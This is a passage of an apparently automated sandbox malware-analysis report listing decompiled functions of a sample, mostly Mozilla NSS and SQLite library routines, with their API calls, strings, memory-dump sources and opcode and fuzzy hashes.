                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC12FFD
                                                                                          • sqlite3_initialize.NSS3 ref: 6CC13007
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CC13032
                                                                                          • sqlite3_mprintf.NSS3(6CC7AAF9,?), ref: 6CC13073
                                                                                          • sqlite3_free.NSS3(?), ref: 6CC130B3
                                                                                          • sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CC130C0
                                                                                          Strings
                                                                                          • sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CC130BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
                                                                                          • String ID: sqlite3_get_table() called with two or more incompatible queries
                                                                                          • API String ID: 750880481-4279182443
                                                                                          • Opcode ID: 49e7642a302d391b0355e5941dfaaa9ce57b5cb39db713aad8a725d058081e94
                                                                                          • Instruction ID: bddb190ead76e4f3013c30d313792589b1aeefa219e8f425e50ce4978feb0c81
                                                                                          • Opcode Fuzzy Hash: 49e7642a302d391b0355e5941dfaaa9ce57b5cb39db713aad8a725d058081e94
                                                                                          • Instruction Fuzzy Hash: A841B275604A06AFDB00CF26D840A4AB7E5FF44358F188629EC1987F40F731F996CB91
                                                                                          Function 6CB58CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,?,6CB6124D,00000001), ref: 6CB58D19
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6CB6124D,00000001), ref: 6CB58D32
                                                                                          • PL_ArenaRelease.NSS3(?,?,?,?,?,6CB6124D,00000001), ref: 6CB58D73
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6CB6124D,00000001), ref: 6CB58D8C
                                                                                            • Part of subcall function 6CBEDD70: TlsGetValue.KERNEL32 ref: 6CBEDD8C
                                                                                            • Part of subcall function 6CBEDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CBEDDB4
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,6CB6124D,00000001), ref: 6CB58DBA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
                                                                                          • String ID: KRAM$KRAM
                                                                                          • API String ID: 2419422920-169145855
                                                                                          • Opcode ID: e3a91d05186bde81eb6bf97416c328853d37c628fb731b8c235681008a077c71
                                                                                          • Instruction ID: 8c4a52b713326c8e5a92de512bfe5410644a6c292e78438766c9cbc38f2939fc
                                                                                          • Opcode Fuzzy Hash: e3a91d05186bde81eb6bf97416c328853d37c628fb731b8c235681008a077c71
                                                                                          • Instruction Fuzzy Hash: 14219CB0A546508FCB00AF38C48426EBBF0FF45308F55896ED89887741E731D861CB92
                                                                                          Function 6CB7ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CB7ACE6
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB7AD14
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB7AD23
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB7AD39
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                          • String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
                                                                                          • API String ID: 332880674-3521875567
                                                                                          • Opcode ID: dab5c322e38fce59bfaef34cebf9faa3b6d4660fc3186bfda9bb118a6cb2bd5f
                                                                                          • Instruction ID: 9ca952cea70b84a463c733ca94a2694c0b37b1e483e606687615d6c993acb7d4
                                                                                          • Opcode Fuzzy Hash: dab5c322e38fce59bfaef34cebf9faa3b6d4660fc3186bfda9bb118a6cb2bd5f
                                                                                          • Instruction Fuzzy Hash: BA21F5717001A49FDB509BA5EE9CBAE3375EB4230EF440025ED1E97A11EB30DC49CBA2
                                                                                          Function 6CC50ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC50EE6
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC50EFA
                                                                                            • Part of subcall function 6CB3AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB3AF0E
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F16
                                                                                          • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F1C
                                                                                          • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F25
                                                                                          • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC50F2B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                          • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                          • API String ID: 2948422844-1374795319
                                                                                          • Opcode ID: 02b32a179ef2a513ac8063d9da42a13391d2b5595639fca56df670cfb932bd14
                                                                                          • Instruction ID: 84e13c2b8cc0c1bdd8cb2d586f3138354cb8b2f841ac4ca18bfd000aefb1fd02
                                                                                          • Opcode Fuzzy Hash: 02b32a179ef2a513ac8063d9da42a13391d2b5595639fca56df670cfb932bd14
                                                                                          • Instruction Fuzzy Hash: 1F016DB6900114BBDF01AFA5DC458AB3F3DEF46368F404464FD0997651E632EA609BB2
                                                                                          Function 6CC14D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC14DC3
                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC14DE0
                                                                                          Strings
                                                                                          • %s at line %d of [%.10s], xrefs: 6CC14DDA
                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC14DCB
                                                                                          • API call with %s database connection pointer, xrefs: 6CC14DBD
                                                                                          • misuse, xrefs: 6CC14DD5
                                                                                          • invalid, xrefs: 6CC14DB8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_log
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                          • API String ID: 632333372-2974027950
                                                                                          • Opcode ID: a94a181faff771709895a0b47732a9268c251cca424419ddab5b9dbfaa8055f4
                                                                                          • Instruction ID: 3a20cc4662ef841410e87ac20be6b71fa9db295ee4c8f95fd59c4fb148cf4c85
                                                                                          • Opcode Fuzzy Hash: a94a181faff771709895a0b47732a9268c251cca424419ddab5b9dbfaa8055f4
                                                                                          • Instruction Fuzzy Hash: 6AF0B421E286646BDB10A126CD11F8637559F0171DF5609E0FD146BF52F215989492A1
                                                                                          Function 6CC14DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CC14E30
                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CC14E4D
                                                                                          Strings
                                                                                          • %s at line %d of [%.10s], xrefs: 6CC14E47
                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CC14E38
                                                                                          • API call with %s database connection pointer, xrefs: 6CC14E2A
                                                                                          • misuse, xrefs: 6CC14E42
                                                                                          • invalid, xrefs: 6CC14E25
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_log
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                          • API String ID: 632333372-2974027950
                                                                                          • Opcode ID: 0fce6071378ee1a4db8fe700bbf1784968eed33d34ec2bd45dd741bf73362d34
                                                                                          • Instruction ID: 3c1d8435715f748ad58bcda8d63856ecc723c0bce6b5902018f3600e296467cd
                                                                                          • Opcode Fuzzy Hash: 0fce6071378ee1a4db8fe700bbf1784968eed33d34ec2bd45dd741bf73362d34
                                                                                          • Instruction Fuzzy Hash: B0F0E221E48928AFEA208127DD10F837B869F0272DF0944A1FA1867E92F30598A162A1
                                                                                          Function 00416210 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess$DefaultLangUser
                                                                                          • String ID: *
                                                                                          • API String ID: 1494266314-163128923
                                                                                          • Opcode ID: 5ece0110b3631b66e0cf394c1ce0ab63be50b876c6328f41a651a73fa16b4c2b
                                                                                          • Instruction ID: 0b6e22eaf0c44992244314602628df478572758edaaa30d1127695f9febd7a00
                                                                                          • Opcode Fuzzy Hash: 5ece0110b3631b66e0cf394c1ce0ab63be50b876c6328f41a651a73fa16b4c2b
                                                                                          • Instruction Fuzzy Hash: 49F05830908A08EFE764AFE0EA09F5CBB3AEF04713F108195F609C7290CB748A11DB55
                                                                                          Function 6CB80C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_SetError.NSS3(00000000,00000000,6CB81444,?,00000001,?,00000000,00000000,?,?,6CB81444,?,?,00000000,?,?), ref: 6CB80CB3
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?,?,6CB81444,?), ref: 6CB80DC1
                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?,?,6CB81444,?), ref: 6CB80DEC
                                                                                            • Part of subcall function 6CBA0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB42AF5,?,?,?,?,?,6CB40A1B,00000000), ref: 6CBA0F1A
                                                                                            • Part of subcall function 6CBA0F10: malloc.MOZGLUE(00000001), ref: 6CBA0F30
                                                                                            • Part of subcall function 6CBA0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBA0F42
                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?), ref: 6CB80DFF
                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CB81444,?,00000001,?,00000000), ref: 6CB80E16
                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?), ref: 6CB80E53
                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?,?,6CB81444,?,?,00000000), ref: 6CB80E65
                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CB81444,?,00000001,?,00000000,00000000,?), ref: 6CB80E79
                                                                                            • Part of subcall function 6CB91560: TlsGetValue.KERNEL32(00000000,?,6CB60844,?), ref: 6CB9157A
                                                                                            • Part of subcall function 6CB91560: EnterCriticalSection.KERNEL32(?,?,?,6CB60844,?), ref: 6CB9158F
                                                                                            • Part of subcall function 6CB91560: PR_Unlock.NSS3(?,?,?,?,6CB60844,?), ref: 6CB915B2
                                                                                            • Part of subcall function 6CB5B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CB61397,00000000,?,6CB5CF93,5B5F5EC0,00000000,?,6CB61397,?), ref: 6CB5B1CB
                                                                                            • Part of subcall function 6CB5B1A0: free.MOZGLUE(5B5F5EC0,?,6CB5CF93,5B5F5EC0,00000000,?,6CB61397,?), ref: 6CB5B1D2
                                                                                            • Part of subcall function 6CB589E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB588AE,-00000008), ref: 6CB58A04
                                                                                            • Part of subcall function 6CB589E0: EnterCriticalSection.KERNEL32(?), ref: 6CB58A15
                                                                                            • Part of subcall function 6CB589E0: memset.VCRUNTIME140(6CB588AE,00000000,00000132), ref: 6CB58A27
                                                                                            • Part of subcall function 6CB589E0: PR_Unlock.NSS3(?), ref: 6CB58A35
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1601681851-0
                                                                                          • Opcode ID: c071ec0740b08dddd5f9409a47d019cb75e4b36434c7a301c431fee9a4b7b81f
                                                                                          • Instruction ID: af131313ba53d73fcf94c991e7c33b24daee0b8460e706abc67c1f3a666a311a
                                                                                          • Opcode Fuzzy Hash: c071ec0740b08dddd5f9409a47d019cb75e4b36434c7a301c431fee9a4b7b81f
                                                                                          • Instruction Fuzzy Hash: E651B8F6D022905FEB009F64EC81AAF37A8EF0525CF550024ED199BB12FB31ED1587A2
                                                                                          Function 6CB36E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6CB36ED8
                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6CB36EE5
                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CB36FA8
                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6CB36FDB
                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CB36FF0
                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6CB37010
                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6CB3701D
                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CB37052
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                          • String ID:
                                                                                          • API String ID: 1920323672-0
                                                                                          • Opcode ID: 2826672bbda86cdf3995a8be3d6aec9ac0595cb2704ec6f82df9d8592a59faf4
                                                                                          • Instruction ID: f4b77d7e5b800a8aed83ef681cd3f3a05c9287b7337a9a9c6657ec4843206a97
                                                                                          • Opcode Fuzzy Hash: 2826672bbda86cdf3995a8be3d6aec9ac0595cb2704ec6f82df9d8592a59faf4
                                                                                          • Instruction Fuzzy Hash: 8961BFB1E042A98BDF00CB68CD406EEB7B2BF45308F285164D418ABB50E7769815CB91
                                                                                          Function 6CBA8F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6CBA7313), ref: 6CBA8FBB
                                                                                            • Part of subcall function 6CBA07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB48298,?,?,?,6CB3FCE5,?), ref: 6CBA07BF
                                                                                            • Part of subcall function 6CBA07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBA07E6
                                                                                            • Part of subcall function 6CBA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBA081B
                                                                                            • Part of subcall function 6CBA07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBA0825
                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA9012
                                                                                          • SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA903C
                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA909E
                                                                                          • PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA90DB
                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA90F1
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA10F3
                                                                                            • Part of subcall function 6CBA10C0: EnterCriticalSection.KERNEL32(?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA110C
                                                                                            • Part of subcall function 6CBA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1141
                                                                                            • Part of subcall function 6CBA10C0: PR_Unlock.NSS3(?,?,?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA1182
                                                                                            • Part of subcall function 6CBA10C0: TlsGetValue.KERNEL32(?,6CB48802,00000000,00000008,?,6CB3EF74,00000000), ref: 6CBA119C
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6CBA7313), ref: 6CBA906B
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6CBA7313), ref: 6CBA9128
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3590961175-0
                                                                                          • Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
